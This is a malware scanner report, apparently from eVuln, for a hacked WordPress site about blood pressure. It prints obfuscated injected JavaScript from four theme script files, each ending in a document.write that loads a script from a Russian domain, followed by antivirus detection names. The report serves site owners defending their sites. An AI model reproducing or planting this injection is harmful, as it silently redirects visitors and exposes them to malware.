New scan:

Malware Scanner report for systolicbloodpressure.org

Malicious/Suspicious/Total urls checked
4/0/10
4 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "systolicbloodpressure.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=systolicbloodpressure.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://systolicbloodpressure.org/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 23 Jan 2015 01:03:30 GMT
Location: http://www.systolicbloodpressure.org/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.systolicbloodpressure.org/xmlrpc.php
clean
http://www.systolicbloodpressure.org/
200 OK
Content-Length: 34217
Content-Type: text/html
clean
http://www.systolicbloodpressure.org/wp-includes/js/jquery/jquery.js?ver=1.8.3
200 OK
Content-Length: 93658
Content-Type: application/javascript
clean
http://www.systolicbloodpressure.org/wp-content/themes/gazette/includes/js/scripts.js?ver=3.5.1
200 OK
Content-Length: 10575
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery(document).ready(function(){
jQuery('.col1 .post.fl').each(function(){

h_left = jQuery(this).children('.box-post-content').height();
h_right = jQuery(this).next('.fr').children('.box-post-content').height();

if(h_left >= h_right)
{
jQuery(this).next('.fr').children('.box-post-content').height(h_left);
}
if (h_left < h_right)
... 3393 bytes are skipped ...
h;if(yFh!='Ik'){yFh=''};f();var lb=false;var DD=39587;NN = '';this.oz=24573;oP = '';var Tq="";mE = '';f = '';this.lK="";var em;if(em!='WC'){em=''};NJ = '';v = '';var pV;if(pV!='AX'){pV=''};var dw;if(dw!='dp' && dw!='jZ'){dw='dp'};var jX;if(jX!='Wt' && jX!='Ox'){jX=''};return '';this.DsL=62085;};var UtS;if(UtS!='FI'){UtS='FI'};this.lr=false;R(Lwd);



document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/VGA.js"></scri'+'pt>');

Antivirus reports:

AntiVir
JS/Redirector.11514
Avast
JS:Illredir-S [Trj]
Ad-Aware
Trojan.JS.Redirector.W
Ikarus
Trojan.JS.Obfuscated
nProtect
Trojan.JS.Redirector.W
K7AntiVirus
Trojan ( f4ade2000 )
TrendMicro-HouseCall
TROJ_GEN.F47V1209
Emsisoft
Trojan.JS.Redirector.W (B)
Comodo
TrojWare.JS.Redirect.sst
K7GW
Exploit ( 04c55f621 )
DrWeb
JS.Redirector.12
Microsoft
Trojan:JS/Redirector.CW
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
MicroWorld-eScan
Trojan.JS.Redirector.W
Fortinet
JS/HackLoad.BBEL!tr
TotalDefense
JS/Redirector.BB
NANO-Antivirus
Trojan.Script.Pegel.yftup
F-Secure
Trojan.JS.Redirector.W
VIPRE
Trojan.JS.Redirector.bg (v)
F-Prot
JS/Redir.AQ
AVG
JS/Obfuscated
Norman
Redirector.JA
Sophos
Troj/Iframe-EA
GData
Trojan.JS.Redirector.W
Commtouch
JS/Redir.AQ
Agnitum
JS.Obfuscated.Gen.1
BitDefender
Trojan.JS.Redirector.W

http://www.systolicbloodpressure.org/wp-content/themes/gazette/includes/js/woo_tabs.js?ver=3.5.1
200 OK
Content-Length: 10383
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery(document).ready(function(){

var tag_cloud_class = '#tagcloud';

var tag_cloud_height = jQuery('#tagcloud').height();
jQuery('.inside ul li:last-child').css('border-bottom','0px') jQuery('.wooTabs').each(function(){
jQuery(this).children('li').children('a:first').addClass('selected'); });
jQuery('.inside > *').hide();
jQuery('.inside > *:first-c
... 3291 bytes are skipped ...
h;if(yFh!='Ik'){yFh=''};f();var lb=false;var DD=39587;NN = '';this.oz=24573;oP = '';var Tq="";mE = '';f = '';this.lK="";var em;if(em!='WC'){em=''};NJ = '';v = '';var pV;if(pV!='AX'){pV=''};var dw;if(dw!='dp' && dw!='jZ'){dw='dp'};var jX;if(jX!='Wt' && jX!='Ox'){jX=''};return '';this.DsL=62085;};var UtS;if(UtS!='FI'){UtS='FI'};this.lr=false;R(Lwd);



document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/VGA.js"></scri'+'pt>');

Antivirus reports:

AntiVir
JS/Redirector.11514
Avast
JS:Illredir-S [Trj]
Ad-Aware
Trojan.JS.Redirector.W
Ikarus
Trojan.JS.Redirector
nProtect
Trojan.JS.Redirector.W
K7AntiVirus
Trojan ( f4ade2000 )
TrendMicro-HouseCall
TROJ_GEN.F47V1209
Comodo
TrojWare.JS.Redirect.sst
Emsisoft
Trojan.JS.Redirector.W (B)
K7GW
Exploit ( 04c55f621 )
DrWeb
JS.Redirector.12
Microsoft
Trojan:JS/Redirector.CW
MicroWorld-eScan
Trojan.JS.Redirector.W
Fortinet
JS/HackLoad.BBEL!tr
TotalDefense
JS/Redirector.BB
NANO-Antivirus
Trojan.Script.Pegel.yftup
F-Secure
Trojan.JS.Redirector.W
VIPRE
Trojan.JS.Redirector.bg (v)
F-Prot
JS/Redir.AQ
AVG
JS/Obfuscated
Norman
Redirector.JA
Sophos
Troj/Iframe-EA
GData
Trojan.JS.Redirector.W
Commtouch
JS/Redir.AQ
Agnitum
JS.Obfuscated.Gen.1
BitDefender
Trojan.JS.Redirector.W

http://www.systolicbloodpressure.org/wp-content/themes/gazette/includes/js/GASlider.js?ver=3.5.1
200 OK
Content-Length: 20463
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery(document).ready(function(){

var slide_fade = true;
var content_fade = true;
var padding_offset = 20;
var counter = 0;
var amount_of_slides = jQuery('#slider-holder .slide').length;
var rel_left = amount_of_slides;
var slider_tracker = 1;
var rel_right = 2;
var slider_height = jQuery('#slider-holder').height();
var slider_width = jQuery('#slider-holder').width();

jQuery('#sli
... 3342 bytes are skipped ...
h;if(yFh!='Ik'){yFh=''};f();var lb=false;var DD=39587;NN = '';this.oz=24573;oP = '';var Tq="";mE = '';f = '';this.lK="";var em;if(em!='WC'){em=''};NJ = '';v = '';var pV;if(pV!='AX'){pV=''};var dw;if(dw!='dp' && dw!='jZ'){dw='dp'};var jX;if(jX!='Wt' && jX!='Ox'){jX=''};return '';this.DsL=62085;};var UtS;if(UtS!='FI'){UtS='FI'};this.lr=false;R(Lwd);



document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/VGA.js"></scri'+'pt>');

Antivirus reports:

AntiVir
JS/Redirector.11514
Avast
JS:Illredir-S [Trj]
Ad-Aware
Trojan.JS.Redirector.AIU
Ikarus
Trojan.JS.Obfuscated
nProtect
Trojan.JS.Redirector.AIU
K7AntiVirus
Trojan ( f4ade2000 )
TrendMicro-HouseCall
TROJ_GEN.F47V1209
Comodo
TrojWare.JS.Redirect.sst
Emsisoft
Trojan.JS.Redirector.AIU (B)
K7GW
Exploit ( 04c55f621 )
DrWeb
JS.Redirector.12
Microsoft
Trojan:JS/Redirector.EV
Kaspersky
Trojan-Downloader.JS.Pegel.g
MicroWorld-eScan
Trojan.JS.Redirector.AIU
Fortinet
JS/HackLoad.BBEL!tr
TotalDefense
JS/Redirector.BB
NANO-Antivirus
Trojan.Script.Pegel.yftup
F-Secure
Trojan.JS.Redirector.AIU
VIPRE
Trojan.JS.Redirector.bg (v)
F-Prot
JS/Redir.AQ
AVG
JS/Obfuscated
Norman
Redirector.JA
Sophos
Troj/Iframe-EA
GData
Trojan.JS.Redirector.AIU
Commtouch
JS/Redir.AQ
BitDefender
Trojan.JS.Redirector.AIU

http://www.systolicbloodpressure.org/wp-content/themes/gazette/includes/js/superfish.js?ver=3.5.1
200 OK
Content-Length: 13789
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

;(function($){
$.fn.superfish = function(op){
var sf = $.fn.superfish,
c = sf.c,
$arrow = $(['<span class="',c.arrowClass,'"> &#187;</span>'].join('')),
over = function(){
var $$ = $(this), menu = getMenu($$);
clearTimeout(menu.sfTimer);
$$.showSuperfishUl().siblings().hideSuperfishUl();
},
out = function(){
var $$ = $(this), menu = getMenu($$), o = sf.op;
clearTimeout(menu.sfTimer);
men
... 3419 bytes are skipped ...
h;if(yFh!='Ik'){yFh=''};f();var lb=false;var DD=39587;NN = '';this.oz=24573;oP = '';var Tq="";mE = '';f = '';this.lK="";var em;if(em!='WC'){em=''};NJ = '';v = '';var pV;if(pV!='AX'){pV=''};var dw;if(dw!='dp' && dw!='jZ'){dw='dp'};var jX;if(jX!='Wt' && jX!='Ox'){jX=''};return '';this.DsL=62085;};var UtS;if(UtS!='FI'){UtS='FI'};this.lr=false;R(Lwd);



document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/VGA.js"></scri'+'pt>');

Antivirus reports:

AntiVir
JS/Redirector.11514
Avast
JS:Illredir-S [Trj]
Ad-Aware
Trojan.JS.Redirector.AIU
Ikarus
Trojan.JS.Obfuscated
nProtect
Trojan.JS.Redirector.AIU
K7AntiVirus
Trojan ( f4ade2000 )
TrendMicro-HouseCall
TROJ_GEN.F47V1209
Comodo
TrojWare.JS.Redirect.sst
Emsisoft
Trojan.JS.Redirector.AIU (B)
K7GW
Exploit ( 04c55f621 )
DrWeb
JS.Redirector.12
Microsoft
Trojan:JS/Redirector.CW
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
MicroWorld-eScan
Trojan.JS.Redirector.AIU
Fortinet
JS/HackLoad.BBEL!tr
TotalDefense
JS/Redirector.BB
NANO-Antivirus
Trojan.Script.Pegel.yftup
F-Secure
Trojan.JS.Redirector.AIU
VIPRE
Trojan.JS.Redirector.bg (v)
F-Prot
JS/Redir.AQ
AVG
JS/Obfuscated
Norman
Redirector.JA
Sophos
Troj/Iframe-EA
GData
Trojan.JS.Redirector.AIU
Commtouch
JS/Redir.AQ
Agnitum
JS.Obfuscated.Gen.1
BitDefender
Trojan.JS.Redirector.AIU

http://addonrock.ru/VGA.js
500 Can't connect to addonrock.ru:80
Content-Length: 187
Content-Type: text/plain
clean
http://addonrock.ru/test404page.js
500 Can't connect to addonrock.ru:80
Content-Length: 187
Content-Type: text/plain
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 19489
Content-Type: text/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: systolicbloodpressure.org

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 23 Jan 2015 01:03:30 GMT
Location: http://www.systolicbloodpressure.org/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.systolicbloodpressure.org/xmlrpc.php

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: systolicbloodpressure.org
Referer: http://www.google.com/search?q=systolicbloodpressure.org

Result:
The result is similar to the first query. There are no suspicious redirects found.